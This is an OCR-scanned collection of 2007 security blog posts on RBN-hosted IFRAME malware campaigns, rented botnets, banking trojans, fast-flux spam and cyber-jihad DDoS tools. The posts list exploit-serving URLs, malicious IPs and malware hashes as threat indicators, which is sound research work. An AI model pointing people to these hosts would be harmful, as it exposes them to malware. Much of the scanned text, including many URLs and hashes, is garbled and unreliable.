Farah , Ray Robison, team at Counter terrorism Blog, 
Jamestown, Memri, SITE, and many many others. This 

"Brilliant sector " is missing part of the "Civilian War Effort 
Paradigm". The output has been voluminous and timely and 
very high quality. But it has been aimed at only part of the 
Demographic. The American or Western sector. The 

"Brilliant sector" recognizes the value of translating terrorist 
media, documents etc. And their analysis is top level. 

But they seem to have missed the value in translating their 
analysis into indigenous languages, or Arabic at least. " 

Wisdom of the opinionated crowds, the value added 
objectivity due to non-existing departamental budget al¬ 
location battles, combined with state of the art open source 
intelligence gathering for the world's intelligence 

community to take advantage of - all courtesy of the 
"Brilliant civilian sector". And why not? While I fully agree 
with Gerald's point on translating anti-terror PSYOPS material 
into Arabic, the way cyber jihadists are actively recruiting 
and winning the minds and hearts of English 
speaking/understanding web surfers, thus radicalizing them 
to the 

bottom of their brains, it's also worth mentioning that cyber 
jihadists are already doing it by actively translating 



English2Arabic the way I'm for instance translating 
Arabic2English - using commercial or free services. Moreover, 

the way the "brilliant civilian sector" is watching video 
material that they've uploaded, they're also watching news 
excerpts on YouTube, and following everything related to 
terrorism. Perhaps more research should be conducted on 

the cyber jihadists' counter surveillance practices, how 
decent is their level of situational awareness, which are their 
main sources for OSINT, and how influential they are so that 
adequate measures could be taken. One way to do is is 

by taking [3]a rather big sample of outgoing links from their 
communities in order to better understand their main 

OSINT sources. 

By the way, remember the [4]Caravan of Martyrs which I 
[5]first mentioned in June, and later on crawled 

knowing it will sooner or later dissapear? It's now gone with 
the summer wind, for good. 

1. http://warintel.blo as pot.com/20Q7/10/usa-civilian-terrorist- 
paradi a m-lackin a .html 

2. http://warintel.blo as pot.com/ 

3. http://ddanchev.blo as pot.com/2007/Q8/analvses-of-cvber- 
i ihadist-forums-and.html 

4. http://caravanofmartvrs.wordpress.com/ 

5. http://ddanchev.blo as pot.com/2007/Q6/list-of-terrorists- 
blo a s.html 
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Possibility Media's Malware Fiasco (2007-10-30 
14:22) 

After both [l]TrendMicro and [2]Sophos acknowledged the 
[3]attack on Possibility Media's portfolio of online 

publications, added detection, further clustered the attack, 
as well as came up with a fancy graph to visualize the 

IFRAME-ing attack, the attackers changed the IFRAME code 
and directed it to another location, and perhaps it's 

more interesting to see them express their feelings about 
getting exposed in such a coordinated manner. The 

second IFRAME URL from the previous post now greets with " 
ai siktir vee ?" message. What does 11 ai siktir vee" 

means? It means "get lost". The new IFRAME URLs as of 
yesterday are exploiting MDAC ActiveX code execution 

(CVE-2006-0003), and here are more details : 

(58.65.239.28) ilovemyloves.com/films/in.cgi? 11 

ilovemyloves.com/traff.php 

ilovemyloves.com/fuck.php 

ilovemyloves.com/lol.php 

ilovemyloves.com/nuc/index.php 

ilovemyloves.com/games/index.php 

ilovemyloves.com/ra/load. php 


Is there by any chance the possibility that the [4]Russian 
Business Network's IPs might be somehow involved? 

Don't be naive - of course there are RBN IPs involved and 
talking about them, deobfuscating scripts or analyzing 

the binaries related to RBN is becoming a rather boring task 
given nothing's changing. Remember all those parked 

domains on the second IFRAME IP from the previous post? 
[5]According to this writeup by Symantec's Kaoru Hayashi, 

some of the hosts - fiderfox.info:8081; 
gipperlox.info:8081; gipperlox.info:8081 - are acting as 
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platforms with a trojan downloaded from an RBN IP - 
81.95.144.146 in order for the trojan to receive spam 
sending configurations. Now, where do we know 
81.95.144.146 from? From the [6]Bank of India hack as it 
was among the 

several IPs used in the IFRAME attack. 

Getting back to the latest developments behind the dynamic 
tactical warfare applied by the attackers at 

208.72.168.176, they seem to have introduced a new 
obfuscation at : 208.72.168.176/e- 
Mikhalich2210/index.php which you can see in the 

screenshot attached. Once we get to feel the binary we can 
conclude it's a spam bot known 

under different names such as Dropped:Trojan.Proxy.Pixoliz.l; 
Trojan-Proxy.Pixoliz and W32/Pixoliz. 


Detection rate : Result: 11/32 (34.38 %) 

File size: 123924 bytes 

MD5: 15027f9e4dc93e95e70f7086f2bf22de 

SHA1: 494a675df55167cf4ed5a2c0320cdaa90dbbcl0e 

New domains under different IPs are also connected with the 
previous and the current IFRAMEs as they all 

tell me to " ai siktir", for instance : 

privatechecking.cn/stool/index.php 
musicboxl.cn/iframe.php 
xanjan. info/ad/index, php 

There's even [7]a Storm Worm connection. For instance, 
musicboxl.cn/iframe.php refreshes [8]textdesk.com 

which is heavily polluted with known storm worm domains 
such as : 

eliteproject.cn/ts/in.cgi/alex; 

88.255.90.74/su/in.cgi?3; 81.95.144.150/in.cgi?ll; 
takenames.cn/in.php; blOcker.info/in.php; space- 
sms.info etc. 

Dots, dots, dots and data speaks for itself. 

1. http://blo a .trendmicro.com/malicious-iframes-hosted-on-e- 
zines-a-media-oossibilit v/ 


2. http://www.sophos.com/securitv/blo a /2007/10/714.html 










3. http://ddanchev.blo as pot.com/2007/10/portfolio-of- 
malware-embedded-ma a azines.html 


4. http://ddanchev.blo as pot.com/20Q7/10/russian-business- 
network.html 


5. http://www.svmantec.com/securitv response/writeu p.isp? 
docid = 2007-091508-2904-99&ta bid = 2 

6. http://ddanchev.blo as pot.com/2007/08/bank-of-india- 
servin a -malware.html 

7. http://www.diso a .or a /2007/09/stormworm-iframe-hell.html 

8. http://www. a oo a le.com/interstitial? 
url = http://www.textdesk.com/ 
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Botnet on Demand Service (2007-10-31 00:45) 

Once this "rent a botnet" or "botnet on demand" service 
depending on the perspective made it in the mainstream 
press, they switched locations, but I'm sure they'll continue 
to advertise themselves given the potential for such a 

service. The first screenshot provides the "botnet inventory", 
as you can see the botnet has a total 35015 infected hosts, 
but with only 2342 of them online when I last checked. On a 
per rate of 252 infected hosts for the last two 

hours, and with 5279 for the last 24, their only problem is to 
have the malware actually respond, and "phone back home". 

From another perspective, "rent a botnet" is a bit different as 
a service concept next to "[l]botnet on demand" where this 
























service is a combination of the two of these. Rent a botnet 
means there's an already available inventory, that 

is they're aware of the exact number of infected hosts they 
have, and are capable of meeting the demand until 

their supply gets depleted, which is where "botnet on 
demand" comes into play. Botnet on demand, like the entire 
"on demand" concept, doesn't build inventory of infected 
hosts and sit on them waiting for someone to require them. 
Instead, infected hosts get "infected" as requested, another 
indication of their understanding of what malicious 
economies of scale is all about - anticipating the success of 
exploiting outdated client side vulnerabilities on a large 
scale. 
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What about the prices? Differentiated pricing on a per 
country is an interesting pricing approach, for instance, 1000 

infected hosts in Germany are available for $220, and 1000 
infected hosts in the U.S go for half the price $110. It 

doesn't really feel very comfortable knowing someone's 
bargaining with your bandwidth and clean IP reputation, 

does it? What's worth discussing is the fact that the service 
isn't marketed as a [2]DIY DDoS service, but as a simple 
acccess to a botnet one, where the possibilities for abuse are 
well known to everyone reading here. Spamming and 

phishing mailings, hosting and distribution of malware using 
the rented infrastructure, [3]OSINT through botnets, 


[4]corporate espionage through botnets, pretty much all the 
ugly practices you can think of. 

If the service was a "rent a botnet" it could have increased its 
chances of having something to do with Storm Worm's 
"divide and conquer" approach of segmenting the botnet into 
smaller ones, since Storm Worm is the 

biggest inventory of infected hosts currently available online. 
But since they offer the "on demand" feature, thereby 
indicating they're surveying the demand for the service itself 
before putting more efforts into building the inventory, I 
doubt it's Storm Worm related. 

1. http://ddanchev.blo as DOt.com/2QQ7/Q5/ddos-on-demand- 
vs-ddos-extortion.html 

2. http://ddanchev.blo as pot.com/2007/Q9/new-ddos- 
malware-kit-in-wild.html 

3. http://ddanchev.blo as pot.com/20Q7/Q4/osint-throu ah- 
botnets.html 

4. http://ddanchev.blo as pot.com/2007/Q5/corporate- 
es piona a e-throu a h-botnets.html 
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Yahoo Messenger Controlled Malware (2007-11-02 
13:16) 

















IM me a command, master. In the spirit of a previoust post on 
[1]DIY Exploit Embedding Tools - a Retrospective, here's a 
very good example of malicious innovation in action - a 
trojan whose client is an instant messaging application - 

Yahoo Messenger in this case. Released in the middle of 
2006, this malware with a nearly 100 % detection rate by 

anti virus vendors, doesn't need any other client to control 
the infected PC, but Yahoo Messenger, making it a good 

example of malicious innovation and "creativity" in action. 
Key points : 

- it's released by an Iranian group 

- it's localized in 11 languages, [2]MPack and IcePack are 
thankfully lacking behind at least so far 

- instead of trying to figure out how to connect to the 
infected host's IP behind a now standard NAT 
implementation, 

the trojan only needs a Yahoo ID to use as a robot ID 

- it's a great example of how IM applications can be used for 
both propagation, infection, and apparently C &C purposes 
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And just when I thought I've seen everything in the sense of 
[3]botnets obtaining their commands using ICQ whitelists, 
and [4]storm worm malware waiting for the infected party to 
authenticate via CAPTCHA then embedd a link to itself 

at a forum/blog given it cannot bypass the CAPTCHA, 
[5]malicious parties again innovate with an analogy of [6]re- 


CAPTCHA in the form of [7]TROJ CAPTCHAR.A, which is more 
or less [8]a logical development I mentioned in previ¬ 
ous posts discussing [9]how are Spammers and Phishers 
Breaking CAPTCHAs and a specific [10]DIY CAPTCHA 
Breaking 

Service in question. 

1. http://ddanchev.blo as pot.com/2007/Q9/div-exploits- 
embeddin a -tools.html 

2. http://ddanchev.blo as pot.com/2007/10/mpack-and- 
icepack-localized-to-chmese.html 

3. http://ddanchev.blo as pot.com/2007/Q3/botnet- 
communication-platforms.html 

4. http://ddanchev.blo as pot.com/2007/Q2/storm-worm- 
switchin a-propaa ation.html 

5. 

http://www.avertlabs.com/research/blo a /index. ph p/2007/ll/ 

01/the-captcha-challen ae/ 

6. http://recaptcha.net/learnmore.html 

7. 

http://www.trendmicro.com/vinfo/virusencvclo/default5.as p? 
VName=TRO I CAPTCHAR.A 

8. http://news.bbc.co.Uk/l/hi/technolo a v/7067962.stm 

9. http://ddanchev.blo as pot.com/2007/Q9/spammers-and- 
phishers-breakin a -captchas.html 

10. http://ddanchev.blo as pot.com/20Q7/10/div-captcha- 
breakin a -service.html 













































585 


£ 


Metaphisher Malware Kit Spotted in the Wild (2007- 
11-02 15:46) 

Such [l]crimeware botnet C &Cs entirely encompassing of 
banker trojans infected PCs can [2]depress every financial 
institution's PR department who often talk more about [3]SSL 
as the cornerstone of secure E-banking [4]than they 

should, next to forwarding the responsibility for fraud 
prevention to the [5]SSL secured customers under the 
umbrella 

of a signed e-banking contract. [6]No Anti Virus Software, no 
E-banking for You mindset is greatly desired to at least slow 
down the emergence of such banking malware botnets. 

When you come across something like this, you get 

the cyber shivers, as it's done for pure massive banking 
frauds in a typical malicious economies of scale fashion. 


Once success is anticipated in the form of infecting as many 
PCs as possible, methods to steamline efficiency start 

emerging. 
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As I've [7]once pointed out, one-time-passwords in 
everything and [8]two-factor authentication is marketable, 
yet it's not the authentication process malware authors 
excel at breaking as they don't even have to. They "form 
grab" and 

"session grab" efficiently in a [9]Nuclear Grabber style, the 
1.0 version of the currently emerging e-banking malware. 

Another related post on [10]FortifySoftware's blog wisely 
debunks the notion that online banking is safer than 

physical banking as an executive tried to convince them. 

1 . 

htto://www. rsaconference.com/uoloadedFiles/RSA365/Securi 
t v Topics/Hackers and Threats/White Paoers/RSA/CRIM 

E WP 0607. pdf 

2 . 

http://www.svmantec.com/avcenter/reference/phishin a jn.th 

e.middle.of.the.stream.pdf 

3. http://ddanchev.blo as pot.com/2007/Q5/client-a p plication- 
for-secure-e-bankin q .html 

4. http://ddanchev.blo as pot.com/2007/Q2/xss- 
vulnerabilities-in-e-bankin a -sites.html 





















5. 

http://www.ebankin a securitv.com/ebankin a bad for vour b 
ank_balance.pdf 

6. http://ddanchev.blo as pot.com/2QQ6/Q5/no-anti-virus- 
software-no-e-bankin a .html 

7. http://ddanchev.blo as pot.com/2QQ7/Q5/defeatin a -virtual- 
kevboards.html 
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8. http://ddanchev.blo as pot.com/2QQ7/Q8/ pav pals-securit v- 
kev.html 

9. http://ddanchev.blo as pot.com/2QQ6/ll/nuclear- a rabber- 
toolkit.html 

10 . 

http://extra.fortifvsoftware.com/blo a /2QQ7/lQ/has_online ba 
nkin a become safe l.html 
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Detecting and Blocking the Russian Business 
Network (2007-11-03 20:32) 

Bleeding Edge Threats [l]recently announced the release of 
[2]some very handy [3]RBN blocking/detecting rulesets : 

" Call these hosts what you like, we see a large amount of 
hostile activity from these nets, and get little to no abuse 
response for takedown, Do what you will with this 
information. 11 





























Remember [4]RBN's fake anti virus and anti spyware 
software? The [5]Iist is getting bigger with another 20 

additions again hosted on RBN IPs exposed by the 
RBNExploit blog. 

Meanwhile you may be also be interested in [6]how does an 
abuse request get handled at the RBN? Decep¬ 
tively of course. Each and every domain or IP that has been 
somehow reported malicious to them, not once but 

numerous times by different organizations starts serving 

[7] a fake account suspended message like the following 

[8] malicious domains hosted at the RBN do : 

" This Account Has Been Suspended For Violation Of Hosting 
Terms And Conditions. Please contact the billing/support 
department as soon as possible'' 

- superengine.cn (81.95.149.181) - fake account 
suspended message, no malicious script at front page but 
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within the domain 

- eliteproject.cn (81.95.149.124) - fake account 
suspended message, no malicious script at front page but 
within the domain 

- space-sms.info (200.115.174.248) - fake account 
suspended, loads the malicious takenames.cn 

- lemOn.info - (200.115.174.248) fake account suspended 
message, obfuscated javascript to blOcker.info 



- worldtraff.cn (200.115.174.248) - fake account 
suspended message, loads blOcker.info and takenames.cn 

- takenames.cn (58.65.239.66) - fake of eValid web 
testing solution, interacting with all of these domains 

Dots, dots, dots, 58.65.239.66 or takenames.cn for the time 
being, used to resolve to goodtraff.biz in the 

past, another RBN operation we know from the [9]Bank of 
India hack, where the second RBN IP was used in the most 

recent [ 10]Possibility Media's Malware Fiasco as well. 

1 . 

http://doc.bleedin a threats.net/bin/view/Main/RussianBusine 

ssNetwork 

2. http://www.bleedin a threats.net/rules/bleedin a -rbn.rules 

3. http://www.bleedin a threats.net/rules/bleedin a -rbn- 
BLOCK.rules 

4. http://ddanchev.blo as pot.com/20Q7/10/rbns-fake- 
securitv-software.html 

5. http://rbnexploit.blo as pot.com/20Q7/10/rbn-more-of-their- 
fake-anti-s p vware-and.html 

6. http://ddanchev.blo as pot.com/2007/10/over-10Q- 
malwares-hosted-on-sm a le-rbn.html 

7. http://blo a .wired.com/27bstroke6/20Q7/10/controversial- 
r.html 


8. http://ddanchev.blo as pot.com/20Q7/10/russian-business- 
network.html 































9. http://ddanchev.blo as pot.com/2QQ7/Q8/bank-of-india- 
servin a -malware.html 


10. http://ddanchev.blo as pot.com/2QQ7/lQ/possibilit v- 
medias-malware-fiasco.html 
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Managed Fast-Flux Provider (2007-11-03 20:59) 

Vertical integration in the spamming market means you 
don't just provide potential customers lists in the form 

of harvested emails, the [^infrastructure for the mass 
mailing consisting of hundreds of infected PCs, but also, 

occupying emerging market segments such as the need for 
increasing the [2]overal time a spam/phishing campaign 

remains online, as well as make it hard to traceback 
courtesy of [3]fast-flux networks. And so, the IP that was 
hosting the spam/phishing campaign in the last 5 minutes is 
now clean and has nothing to do with it. 

There's an interesting tactic [4]phishers and spammers are 
starting to use, next to the pure [5]fast-flux at the 

DNS level I covered in a previous post, and that is a 
dynamically serving the data from multiple locations per 
web 

session. Take [6]meds247.org for instance. Who's providing 
meds247.org's fast-flux infrastructure? In the first 

example we had "a dynamic subdomain generating 
spamming host running a proxy server every time the 










central 


campaign URL gets refreshed via an obfuscated javascript". 
The javascript is now gone, but the content (dynamic 

per page view) is obtained from dynamic locations behind a 
proxy. For instance, while the domain responds to 

78.94.45.76, the content in the session is obtained from 
72.2.16.236:8088/vti _sys. And despite that the DNS 
records and the content IPs change the vti _sys directory 
structure doesn't, a fax fluxing service that I feel Send- 
Safe.com branded as " Your Own Proxies " and as it looks 
like, use on for their own order processing next to 
maintaining a rogue certificate authority for anyone who 
dares to shop there : 

216.153.170.110:8088/vti _sys/order.php? 
product=ssnp 

216.153.170.110:8088/vti _sys/order.php? 
product=sspc 

216.153.170.110:8088/vti _sys/order.php? 
product=ssel 

216.153.170.110:8088/vti _sys/order.php? 
product=ssalonesite 
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67.118.79.234:8088/vti sys/order.php?product=sslm 

[7]More info about [8]Send-Safe.com, a [9]spamware vendor 
that's vertically integrating in the spamming mar¬ 
ket. 



1. http://ddanchev.blo as DOt.com/2Q07/lQ/mana a ed- 
s pammin a-ap p8iances-future-of.html 

2. http://ddanchev.blo as pot.com/2Q07/07/avera a e-onllme- 
time-for-phishin a -sites.html 

3. http://ddanchev.blo as pot.com/2QQ7/Q9/storm-worms-fast- 
f1ux-networks.html 

4. http://ddanchev.blo as pot.com/2QQ7/lQ/fast-f1uxin a-vet- 
another-pharmacv-scam.html 

5. http://ddanchev.blo as pot.com/20Q7/lQ/fast-f1ux-spam- 
and-scams- i ncreasin a .html 

6. http://ddanchev.blo as pot.com/20Q7/lQ/love-is- 
ps vchedelic-too.html 

7. http://www.f-secure.com/weblo a /archives/QQQQQ485.html 

8. http://www.spamhaus.or a /rokso/listin a .lasso?- 
o p=cn&spammer=Ruslan%2Qlbra a imov%20/%20send- 
safe.com 

9. 

http://spamkin a s.oreillv.com/archives/2QQ5/Q2/vint_cerf_on_ 

th.html 
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Rebranding a Security Vendor (2007-11-05 03:39) 

Rebranding by itself is a tricky process, which if not 
coordinated at all levels of the enterprise could result in 
severe channel conflicts damaging the brand's image, and 
increasing the risk of confused positioning. 













































[l]PandaSoftware's recent rebranding to PandaSecurity 
comes as a smoothly executed example of the process, as 

it needed to take advantange of the entire [2]marketing 
toolset in order to communicate their new vision, mostly 

a sound repositioning strategy emphasizing that the 
company's core competency is not software in general, but 
IT 

security. As in every other marketing campaign aiming to 
achieve such effect, the business lingo used affects the 

prospective audience of the campaign, be it the U.S or the 
EMEA markets or even better in respect to globalization 

- try to influence both with a clear vision, namely that" 
Prevention is better than the cure". The question from a 
marketing perspective always remains - is it a brand with a 
mission, or is it a mission with a brand, and isn't the 

second a better socially oriented positioning than the 
standard practice? 

Meanwhile, here's another proof that building a solid brand 
results in sustained brand equity, thereby attracting 
potential acquirers' interest which is [3]the case with 
McAfee's recent [4]acquisition of ScanAlert for $51M. What 
they're 

buying is not the technology behind the company, a daily 
managed penetration testing process, but [5]ScanAlert's 

brand and clients list. 

Related posts: 



[6] Microsoft's Forefront Ad Campaign 

[7] Microsoft's OneCare Penetration Pricing Strategy 
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[8] Microsoft in the Information Security Market 

[9] Overachieving Technology Companies 

[10] China's Information Security Market 

[11] Spotting valuable investments in the information 
security market 

[12] Look who's gonna cash for evaluating the maliciousness 
of the Web? 

[13] Taking Down Phishing Sites - a Business Model? 

[14] Take this Malicious Site Down - Processing order.. 

[15] Budget Allocation Myopia and Prioritizing Your 
Expenditures 

[16] Valuing Security and Prioritizing Your Expenditures 

1. http://www.pandasecuritv.com/about/brand/ 

2. http://www.voutube.com/watch?v=pSs79Z9nw iA 

3. 

http://www.mcafee.com/us/about/corporate/mcafee seanaIe 
rt.html 

4. 

http://news.vahoo.eom/s/ap/20071030/ap on hi te/mcafee 
scanalert 
















5. 

http://www.mcafee.com/us/local_content/media/mcafee sea 

nalert acauisition_overview.pdf 

6. http://ddanchev.blo as pot.com/2QQ7/Q5/microsofts- 
forefront-ad-campai a n.html 

7. http://ddanchev.blo as pot.com/2Q06/Q8/microsofts- 
onecare-penetration-pricin a .html 

8. http://ddanchev.blo as pot.com/2QQ6/Q5/microsoft-in- 
information-securitv.html 

9. http://ddanchev.blo as pot.com/2QQ7/Q2/overachievin a- 
technolo a v-companies.html 

10. http://ddanchev.blo as pot.com/2QQ6/lQ/chinas- 
information-secuntv-market.html 

11. http://ddanchev.blo as pot.com/2QQ6/Q4/spottin a¬ 
val uable-investments-in.html 


12. http://ddanchev.blo as pot.com/2QQ6/Q2/look-whos- 
a onna-cash-for-evaluatin a .html 

13. http://ddanchev.blo as pot.com/2QQ7/Q4/takin a -down- 
phishin a -sites-business.html 

14. http://ddanchev.blo as pot.com/2QQ7/Q3/take-this- 
malicious-site-down.html 


15. http://ddanchev.blo as pot.com/2QQ6/Q7/bud a et- 
allocation-m vo pia-and.html 

16. http://ddanchev.blo as pot.com/2QQ6/Q5/valuin a -securit v- 
and-prioritizm a- vour.html 
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Overperforming Turkish Hacktivists (2007-11-05 
09:41) 

Last month's [l]Turkish/Sweden hacktivism tensions 
surprised me mainly because the [2]Swedes responded to 
the 

defacements in an entirely different way : 

11 On Saturday a group of disgruntled hackers posted a 
comment to the Flashback online forum Unking to a 

stolen database containing thousands of user names and 
passwords from Turkish forum Ayyldz, the site thelocal.se 

reported on Tuesday The Swedes also broke into the e-mail 
and MSN accounts of Turkish Web users and sent 

messages using the stolen identities. Among the images in 
circulation was a pornographic illustration of the Prophet 
Mohammed and Mustafa Kemal Ataturk, the founder of the 
modern Turkish state. " 

How do you keep track of defaced sites "courtesy" of Turkish 
script kiddies? [3]Zone-h for sure, while in fact there're so 
many defacements done by Turkish hacking groups, that the 
hacktivists have localized the defacement achives into 

Turkish for better transparency, and by doing so it makes 
Turkish defacements during hacktivism wars much easier to 

keep track of. Who are the most active Turkish defacers 
anyway? 

Top 5 Turkish Defacers at the [4]first defacement mirror: 


[5]U-H-T - [6]8517 
[7]1923turk - [8]6711 
[9]hackpowerteam.org - [10]5364 
[11]By CECEN - [12]5230 
[13]nadir _piero - [14]4440 

Top 5 Turkish Defacers at the [15]second defacement mirror 

[16] Lonely.Antalya - 1101 

[17] PitlO - 1000 

[18] beyrut-Kal3uS - 863 

[19] HEXB00T3R - 747 

[20] myturkx.org - 675 
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Lots of data to cross-check for sure. Best of all - it's a real 
time example of the [21]people's information warfare 

concept, virtual PSYOPS to be precise. Defacing sites using 
automated vulnerability scanning and exploitation tools 

is one thing, [22]embedding malware on the defaced sites is 
totally another, and while we've been witnessing 

the emergence of [23]embedded malware during 2007, it's 
questionable whether it's done for the aggregation of 


infected hosts into botnets only, or a specific hacktivist 
cause for instance. 

1. http://www.cbc.ca/technolo a v/storv/20Q7/10/Q8/turke v- 
hackers.html 

2. http://www.todavszaman.com/tz-web/detavlar.do? 
load = detav&link = 12492 2 

3. http://www.zone-h.or g/ 

4. http://turk-h.or g /root 

5. http://turk-h.or g /Attacker/2311/U-H-T 

6. http://turk-h.or g /defacement/filter/defacer/2311/U-H-T 

7. http://turk-h.or g /Attacker/1390/1923turk 

8. htto://turk- 

h.or a /defacement/fi lter/defacer/1390/192 3turk 

9. http://turk-h.or g /Attacker/1963/hackpowerteam.or a 

10. htto://turk- 

h.or a /defacement/filter/defacer/1963/hackpowerteam.or a 

11. http://turk-h.or a /Attacker/987/Bv CECEN 

12. htto://turk- 

h.or a /defacement/filter/defacer/987/Bv CECEN 

13. http://turk-h.or g /Attacker/1280/nadir_piero 

14. htto://turk- 

h.or a /defacement/fi lter/defacer/12 80/nadir_piero 

15. http://www.s p v-h.or g /top50/ 















































16. http://www.s p v-h.or a /hacker/?user= Lonely.Antal va 

17. http://www.s p v-h.or a /hacker/?user=PitlQ 

18. http://www.s p v-h.or a /hacker/?user=bevrut-Kal3uS 

19. http://www.s p v-h.or a /hacker/?user=HEXBQQT3R 

20. http://www.s p v-h.or a /hacker/?user= mvturkx.or a 

21. http://ddanchev.blo as pot.com/20Q7/10/peoples- 
information-warfare-concept.html 

22. http://ddanchev.blo as pot.com/2007/Q7/malware- 
embedded-sites-increasin a .html 

23. http://ddanchev.blo as pot.eom/2007/09/ po pular-web- 
malware-exploitation.html 
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I See Alive IFRAMEs Everywhere (2007-11-06 20:26) 

During the weekend, the entire Newsland.ru which is 
among the most popular Russian news portals, was marked 

as as "this site may harm your computer" by 
StopBadware.org due to an IFRAME embedded link pointing 
to where else if not to [l]the RBN. Considering that each 
and every [2]embedded malware attack during 2007 that I 
assessed 

in previous posts, had something to do with the RBN in the 
form of a single RBN IP which was used in numerous 



































malicious activities all at once, different sites get embedded 
with it, blackhat SEO postings at different forums etc. in this 
one the parties behind the attack dedicated a special IP with 
what looks like as a clean IP reputation. A [3]cached copy of 
the page will still load the live exploit url at 
81.95.150.115/cgi-bin/in.cgi?p=userl What really 
happened at Newsland.ru? Was it an end user who 
submitted a news story with the somehow embedded 
I FRAME to sort of 

conduct unethical competitive engagement by having 
Google mark the entire portal as harmful, or it was planned 

and executed on purposely? 

[4] 
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In another such incident, Podfeed.net was recently hacked 
and [5]malware embedded at its front page. The now 

clean site however, used to have an embedded link, over 20 
times to be precise, pointing to the following URL : 

yll8.net/O.js (125.65.77.25) with the .js having two 
IFRAMEs within, namely yll8.net/O.html - 404 dead, and 
the second IFRAME yll8.net/z.html which loads a third 
IFRAME within, pointing to yzgames.cn/game.htm 

(125.46.105.140). This IFRAME-ing game relies entirely on 
yll8.net/0.js to keep up and running, and a direct loading 
link to the script was also somehow embedded on high 
trafficked sites such as cincinnatiusa.com; 
cincinnati.com; guidance.nice.org.uk. Moreover, 


Maarten Van Horenbeeck at the [6]ISC's blog has some 
detection rates while the 

malware was still active. This embedded malware campaign 
is a perfect example of an ongoing cover up, just like 

the case when several hours after the community started 
looking at the [7]Bank of India's malware serving site and 

the RBN URL removed the javascript and redirected it to 
Google.com, and we had the same situation with the recent 

discovery of 100 malwares on a single RBN IP, where the 
directory name has changed several hours later for yet 

another time. The same is the situation withe the malicious 
parties behind [8]PossibiIity Media's malware attack that 

once started getting visited by security vendors replaced all 
their main index page with a "get lost" message, as well as 
with [9]RBN's fake "account suspended" messages which 
aren't really in a process of cover up, but in a deception 
stage like always. 

While I was researching a third domain that was serving a 
Banking trojan, and loading IFRAMEs to sicil.info 

which in case you don't remember is the IFRAME behind the 
[lOjSyrian Embassy hack, I came across to [ 11 ]injected 

blackhat SEO campaigns at two universities advertised in 
between the IFRAMEs, now removed, cached copies 

available - emissary.wm.edu/EE/cache; 
hsutx.edu/student life/brand/wp-content/uploads. 

The reason I won't mention the domain in question is that 
the script kiddies behind it forgot to take care of their 



directory permissions just like the Russian Business Network 
did recently, and while in [12]RBN's case over 100 malwares 
were spotted, in 

this case it's a web C &C for a metaphisher type of banking 
malware kit, namely Zeus. It gets even more interesting, as 
it appears that a Turkish defacer like the ones [13]l blogged 
about yesterday is somehow connected with the 

group behind the recent Possibility Media's Attack, and the 
Syrian Embassy Hack as some of his IFRAMES are using 

598 

the exact urls in the previous attacks. And you you already 
know while reading my previous assessments and the 
connections between them, one of the attack IP's in the 
Possibility Media's malware attack was also among the ones 

used in the Bank of India hack - it's the "ai siktir vee?" group 
with another unique IP. 

Key points : 

- a Turkish defacer is taking advantage of an remotely 
installed web backdoor in order to host a metaphisher 

type of banking malware kit 

- the defacer is embedding iframes that were used in the 
Bank of India hack, the Syrian Embassy hack, and the 
recent 

Possibility Media's malware attack 

- if defacers start cooperating with malware groups given 
each of them excels at different practices, it's gonna get 



very ugly 

If you don't take care of your site's web vulnerability 
management, someone else will. 

1. http://ddanchev.blo as pot.com/2QQ7/lQ/russian-business- 
network.html 

2. http://seclists.or g /fulldisclosure/2QQ7/Oct/Q892.html 

3. htt p://2Q9.85.135.104/search? 

hl=en&a=cache%3AhttP%3A%2F%2Fnewsland.ru%2FNews 

%2FDetail%2Fid%2F105844%2F 

4. 

http ://l. bp .blo as pot.com/wlCFIhTiOmrA/RzDvTxaTUNI/AAA 
AAAAABEY/oP a fiWuYINQ/sl600-h/podfeed iframe coveru o 

in action. ip.g 

5. 

http:// arou ps. a oo a le.eom/ a roup/stopbadware/t/37437471d2 

ff!868 

6. http://isc.sans.or g /diar v.ph p7storvid = 3621 

7. http://ddanchev.blo as pot.com/2QQ7/Q8/bank-of-india- 
servin a -malware.html 

8. http://ddanchev.blo as pot.com/2Q07/lQ/possibilit v- 
medias-malware-fiasco.html 

9. http://ddanchev.blo as pot.com/2QQ7/ll/detectin a -and- 
blockin a -russian-business.html 

10. http://ddanchev.blo as pot.com/2QQ7/Q9/svrian-embass v- 
in-london-servin a .html 

















































11. http://ddanchev.blo as pot.com/2QQ7/lQ/compromised- 
sites-servin a -malware-and.html 


12. http://ddanchev.blo as pot.com/2QQ7/lQ/over-10Q- 
malwares-hosted-on-sm a le-rbn.html 

13. http://ddanchev.blo as pot.com/2QQ7/ll/overperformin a- 
turkish-hacktivists.html 
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Electronic Jihad v3.0 - What Cyber Jihad Isn't (2007- 
11-07 14:38) 

It's intergalactic security statements like these [l]that 
provoked me to do my most insightful research into the 
topic of [2]what is cyber jihad, or [3]what cyber jihad isn't. 
The news item on cyber jihadists coordinating a massive 
DDoS 

attack is a cyclical one, namely it reappears every quarter 
as it happened in August, and so [4]l reviewed the tool, 

provided screenshots, and commented that while it's an 
aspirational initiative, with thankfully lame execution, it's 

not the coordinated DDoS attack executed in such way that 
should be feared, but cyber jihadists outsourcing the 

process. Despite that absolutely nothing has changed in 
respect to the way the program operates since v2.0, except 

that al-jinan.org changed to the now down al-jinan.net, 

the web is buzzing about the plans of wannabe cyber 
jihadists, the Al Ansar Hacking Team to be precise, to DDoS 















infidel sites on the 11th of November. Boo! Spooky - [5]AI 
Qaeda 

cyber-jihad to begin Nov. 11; [6]The e-Jihadists are coming, 
the e-Jihadists are coming!; [7]Report: Al Qaeda to Launch 
Cyber-Attack on Nov. 11; [8]AI-Qaeda Planning Cyber 
Attack?. 

Key points : 

- despite that the recommended DoS tool itself in the 
previous post is detected by almost all the anti virus 
vendors, in a [9]people's information warfare situation, the 
participants will on purposely turn off their AVs to be able to 
use it 

- the Electronic Jihad program is an example of poorly coded 
one, poorly in the sense of obtaining lists of the sites to be 
attacked from a single location, so you have a situation with 
1000 wannabe cyber jihadists not being able to attack 
anyone in a coordinated manner given the host gets shut 
down 

- the central update locations at the al-jinan.net domain 
are down, [lOjthank you Warintel, and so are the several 
others included, so you have a situation where forums and 
people start recommending the tool, they obtained it 

before the site was shut down, but couldn't get the targets 
to be attacked list 

Time to assess the binary. The program archive's 
fingerprints as originally distributed : 

File size: 358490 bytes 

MD5: f38736ddl6a5ef039dda940941bb2c0d 



SHA1: 769157c6d3fe01aeade73a2de71e54e792047455 


No AV detects this one. 

E-Jihad.exe as the main binary 
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File size: 94208 bytes 

MD5: caf858af42c3ec55be0elcca7c86dde3 

SHA1: f61fde991bfcc6096fal278315cad95bl028cb4b 

